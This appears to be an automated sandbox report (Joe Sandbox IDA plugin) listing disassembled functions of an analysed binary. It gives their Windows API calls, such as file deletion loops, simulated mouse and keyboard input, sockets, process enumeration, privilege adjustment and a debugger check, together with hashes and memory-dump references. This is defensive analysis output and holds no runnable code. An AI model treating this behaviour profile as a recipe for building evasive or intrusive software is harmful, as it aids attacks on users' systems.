                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                • String ID:
                                                • API String ID: 314583886-0
                                                • Opcode ID: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
                                                • Instruction ID: 2d4d12c22c48b61d3cb1cb8e2e5b4d89f06f4ee6a5dea2ad1f8547dd8ab00426
                                                • Opcode Fuzzy Hash: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
                                                • Instruction Fuzzy Hash: 84C13471A04246ABEB249F3A8C85BEE7FB8FF91318F14459AE590DB251E730CE41D750
                                                APIs
                                                  • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                  • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                • FindFirstFileW.KERNEL32(?,?), ref: 0057D420
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D470
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D481
                                                • FindClose.KERNEL32(00000000), ref: 0057D498
                                                • FindClose.KERNEL32(00000000), ref: 0057D4A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                • Opcode ID: f34b22bfdf773d1acf36d8306eb9f5f24247ba4289ec5df2495814359a51ab57
                                                • Instruction ID: 4492faea13b5ff97c31ade59f6912fc78f2ee5c62d5d3948ae735cf9f7e6cddb
                                                • Opcode Fuzzy Hash: f34b22bfdf773d1acf36d8306eb9f5f24247ba4289ec5df2495814359a51ab57
                                                • Instruction Fuzzy Hash: 2D315E710083429BD701EF64D8599EFBFF8BEE2310F448E1DF4D552191EB60AA49E762
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 2639705a19b7efbfbdc79290edc89de81fa9247dd7d632e2f70ab8793298c6b6
                                                • Instruction ID: d7c299d255602201832638ca2b45f1e9c501374821133afc9694ce96cd203bf3
                                                • Opcode Fuzzy Hash: 2639705a19b7efbfbdc79290edc89de81fa9247dd7d632e2f70ab8793298c6b6
                                                • Instruction Fuzzy Hash: 58C25A72E046298FDB25CE28DD457EABBB5FB84308F1445EAD44EE7241E774AE818F40
                                                APIs
                                                • _wcslen.LIBCMT ref: 005864DC
                                                • CoInitialize.OLE32(00000000), ref: 00586639
                                                • CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 00586650
                                                • CoUninitialize.OLE32 ref: 005868D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: bbe80efea17fbf0fbc6bb42756f05901a670b9b3a31076152137757bb55c23c2
                                                • Instruction ID: 5766b7b8f55e185325d770d0756ba79b2c9bba50ec100200c57fc73ef7d1915b
                                                • Opcode Fuzzy Hash: bbe80efea17fbf0fbc6bb42756f05901a670b9b3a31076152137757bb55c23c2
                                                • Instruction Fuzzy Hash: C2D15871508202AFD314EF24C8959ABBBE8FFD8304F40496DF5959B291EB31ED46CB92
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 005922E8
                                                  • Part of subcall function 0058E4EC: GetWindowRect.USER32(?,?), ref: 0058E504
                                                • GetDesktopWindow.USER32 ref: 00592312
                                                • GetWindowRect.USER32(00000000), ref: 00592319
                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00592355
                                                • GetCursorPos.USER32(?), ref: 00592381
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005923DF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                • String ID:
                                                • API String ID: 2387181109-0
                                                • Opcode ID: 9d1260637b44cc3da4d6eabc3b645c9e0f00466f70fff01a2ab47522f6a789d8
                                                • Instruction ID: ab8ac46f56834affceed31e8a00d84c1667fcb0944549a94fd558a1e514ce4f2
                                                • Opcode Fuzzy Hash: 9d1260637b44cc3da4d6eabc3b645c9e0f00466f70fff01a2ab47522f6a789d8
                                                • Instruction Fuzzy Hash: A231DE72505316AFCB20DF14D849B5BBBE9FF89310F000919F98997191DB34EA08CB92
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00589B78
                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00589C8B
                                                  • Part of subcall function 00583874: GetInputState.USER32 ref: 005838CB
                                                  • Part of subcall function 00583874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966
                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00589BA8
                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00589C75
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                • String ID: *.*
                                                • API String ID: 1972594611-438819550
                                                • Opcode ID: cd9f255d80474b86fe1570301180a13b01a275f20cd8a6e1a37f75b96a972c19
                                                • Instruction ID: 07fbb771b0ffd4c3c3a9af82df8d12deabb020f8fa5dcd6892961e74eb99cc67
                                                • Opcode Fuzzy Hash: cd9f255d80474b86fe1570301180a13b01a275f20cd8a6e1a37f75b96a972c19
                                                • Instruction Fuzzy Hash: 9341827190420AAFDF15EFA4C899AEEBFB4FF45310F244456E815B2191EB319E84CF60
                                                APIs
                                                  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00529A4E
                                                • GetSysColor.USER32(0000000F), ref: 00529B23
                                                • SetBkColor.GDI32(?,00000000), ref: 00529B36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Color$LongProcWindow
                                                • String ID:
                                                • API String ID: 3131106179-0
                                                • Opcode ID: cfc1820b6075d2964fb69c04e2e07312443c4ce03a80680f2c5169791115175b
                                                • Instruction ID: ac4656bfb01e6cd28b69ffb343ad604e2269c08c0de2d28f6bac8cdb54a34805
                                                • Opcode Fuzzy Hash: cfc1820b6075d2964fb69c04e2e07312443c4ce03a80680f2c5169791115175b
                                                • Instruction Fuzzy Hash: 5AA1F770108668AEE728AA2CAC9CE7F2E9DFF8B354F140609F502D77D1CB259D41D276
                                                APIs
                                                  • Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                  • Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0059185D
                                                • WSAGetLastError.WSOCK32 ref: 00591884
                                                • bind.WSOCK32(00000000,?,00000010), ref: 005918DB
                                                • WSAGetLastError.WSOCK32 ref: 005918E6
                                                • closesocket.WSOCK32(00000000), ref: 00591915
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 1601658205-0
                                                • Opcode ID: d168676fb91f24ff3471d8d8bbbccabc734be448441b8c89ff6f3f23ac591d02
                                                • Instruction ID: 05880092055b06d605d49a7d571dcc5d2f2ce00b9ed365500872198dffedfaf6
                                                • Opcode Fuzzy Hash: d168676fb91f24ff3471d8d8bbbccabc734be448441b8c89ff6f3f23ac591d02
                                                • Instruction Fuzzy Hash: 9451B275A002119FEB10AF24C88AF6A7FE5BF85718F048458F9165F3C3D771AD418BA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
                                                • Instruction ID: f34e508edbbdb1eaaefda7c8993fd17b0bf63b156bacadfb7320719a1a8a5ba5
                                                • Opcode Fuzzy Hash: 893a00421e68434c2c6070087901979c52133c2fde416e960db13dacc42aed01
                                                • Instruction Fuzzy Hash: 1C218331740A115FE7208F2AC854B6E7FE5FF96325F198068E8468B351CB71DC46CB98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-1546025612
                                                • Opcode ID: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
                                                • Instruction ID: 8874fc9844aae64ebedaa98193ed84187a1ffb264a53b44f0b5359c1225db84e
                                                • Opcode Fuzzy Hash: 3d285605b9d2a835d8779eebecf449feb85882a3e5919315a1bb755c2c2b8fea
                                                • Instruction Fuzzy Hash: F8A26A74A0061ACBEF348F58C8A47FDBBB1BB54311F6485AAD815A7281EB709D85CB90
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005782AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: ($tb]$|
                                                • API String ID: 1659193697-2890004336
                                                • Opcode ID: d2dccfe8ccd06187e64653e1d08d85b8d376eb5b0dad65fc02501434a6169362
                                                • Instruction ID: 5acc7c38a10b7b2a8190d46f6875fdd5a946307441f06f886ed1275ad3df5567
                                                • Opcode Fuzzy Hash: d2dccfe8ccd06187e64653e1d08d85b8d376eb5b0dad65fc02501434a6169362
                                                • Instruction Fuzzy Hash: B2323574A006059FCB28CF59D485A6ABBF0FF48710B15C96EE49ADB7A1EB70E941CB40
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0059A6AC
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0059A6BA
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • Process32NextW.KERNEL32(00000000,?), ref: 0059A79C
                                                • CloseHandle.KERNEL32(00000000), ref: 0059A7AB
                                                  • Part of subcall function 0052CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00553303,?), ref: 0052CE8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                • String ID:
                                                • API String ID: 1991900642-0
                                                • Opcode ID: e9966aac6c9f087808cd4358b6397ecf99372f15f512eabf53461f3c44fbf9e4
                                                • Instruction ID: 0f7578123f3f8661b9f3d33fd859809fff861ad850c5157a9e63722a22c109ae
                                                • Opcode Fuzzy Hash: e9966aac6c9f087808cd4358b6397ecf99372f15f512eabf53461f3c44fbf9e4
                                                • Instruction Fuzzy Hash: 8E512B71508311AFD710EF24D88AAABBBE8FFC9754F00491DF59597291EB30E944CBA2
                                                APIs
                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0057AAAC
                                                • SetKeyboardState.USER32(00000080), ref: 0057AAC8
                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0057AB36
                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0057AB88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
                                                • Instruction ID: 203444b62a6dd7f5777a18ed7777f30a5a573b2bb8ea35d84a609d72279fbf84
                                                • Opcode Fuzzy Hash: a7b9e625ec7f833e5aca24eb455cca2744b0684910cfdf10f673c823141e59c6
                                                • Instruction Fuzzy Hash: A8311530A40208AEFB25CA64E805BFE7FAABBC5310F04C21AF58D561D0D7748985E7A2
                                                APIs
                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0058CE89
                                                • GetLastError.KERNEL32(?,00000000), ref: 0058CEEA
                                                • SetEvent.KERNEL32(?,?,00000000), ref: 0058CEFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorEventFileInternetLastRead
                                                • String ID:
                                                • API String ID: 234945975-0
                                                • Opcode ID: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
                                                • Instruction ID: 717ba3dc2f06fa270d90f1c0f6ecd6b7908c38c7464b4538ed53b1bc01d854b1
                                                • Opcode Fuzzy Hash: e9c1c0924759cbf3368b07cbf4399c80d699fd6c4b22a6eae431f719e46d389b
                                                • Instruction Fuzzy Hash: 7521B0715003059BE731EF65D949BA67FFCFB51314F10481EEA46E2151E774ED089B60
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0054271A
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00542724
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00542731
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
                                                • Instruction ID: a7e356534833ece82dee2b925e8f95037e498253b70cb1e6148de0dc3a26d460
                                                • Opcode Fuzzy Hash: afa0bad793a59e7ef57cef759c7177a981d01b9904b6c01d6fc933f25c2b7c4e
                                                • Instruction Fuzzy Hash: EA31C27490122DABCB21DF68DD887DCBBB8BF18310F5041EAE80CA6260E7309F859F44
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 005851DA
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00585238
                                                • SetErrorMode.KERNEL32(00000000), ref: 005852A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1682464887-0
                                                • Opcode ID: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
                                                • Instruction ID: ccff98b3a51e8eda4305d98c6f91e0c6c59991862f3bc10c31d27e16c8ec55a6
                                                • Opcode Fuzzy Hash: 302896f6692914c909f31026dc2ae98f794663d7dc9fff567ab0d280a3bf993f
                                                • Instruction Fuzzy Hash: EC312C75A00619DFDB00EF54D888EADBFB5FF49314F048099E805AB362DB31E85ACB90
                                                APIs
                                                  • Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530668
                                                  • Part of subcall function 0052FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00530685
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                • GetLastError.KERNEL32 ref: 0057174A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                • String ID:
                                                • API String ID: 577356006-0
                                                • Opcode ID: 268f155e4c234fe2b6824220a25d3d7e0924c6bc417fc0e4814b7664d9f40f59
                                                • Instruction ID: de28525dfd52e3a4012d6f38bbe328d96869c7069b90e1cfbbb5f54c633fd75f
                                                • Opcode Fuzzy Hash: 268f155e4c234fe2b6824220a25d3d7e0924c6bc417fc0e4814b7664d9f40f59
                                                • Instruction Fuzzy Hash: 5911CEB2400305AFD718AF58EC8AD6ABBBDFF45714B20C52EE05A57281EB70BC419B24
                                                APIs
                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D608
                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0057D645
                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057D650
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle
                                                • String ID:
                                                • API String ID: 33631002-0
